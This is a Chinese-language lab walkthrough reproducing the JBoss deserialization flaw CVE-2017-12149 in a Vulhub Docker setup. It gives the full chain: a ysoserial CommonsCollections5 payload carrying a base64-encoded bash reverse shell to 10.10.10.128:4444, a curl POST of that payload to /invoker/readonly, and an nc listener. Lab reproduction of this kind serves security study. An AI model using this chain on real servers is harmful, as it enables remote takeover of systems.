JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）

该漏洞为Java反序列化错误类型，存在于Jboss的HttpInvOKER隔离器中，该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。

漏洞复现

该漏洞出现在/invoker/readonly请求中，服务器将用户提交的POST内容进行了Java反序列化：

cd jboss/CVE-2017-12149
docker-compose up -d
docker-compose config

编写反弹shell命令
使用bash来反弹shell，但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法，我们需要用进行一次编码。编码地址

序列化数据生成

使用ysoserial来复现生成序列化数据，由于Vulhub使用的Java版本较新，所以选择使用的gadget是CommonsCollections5：

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

发送POC

生成好的POC即为poc.ser，将这个文件作为POST Body发送至/invoker/readonly即可：
使用curl命令，将我们的序列化数据以POST的形式发送。

curl http://10.10.10.10:8080/invoker/readonly --data-binary @poc.ser

监听端口

nc -lvnp 4444

成功反弹shell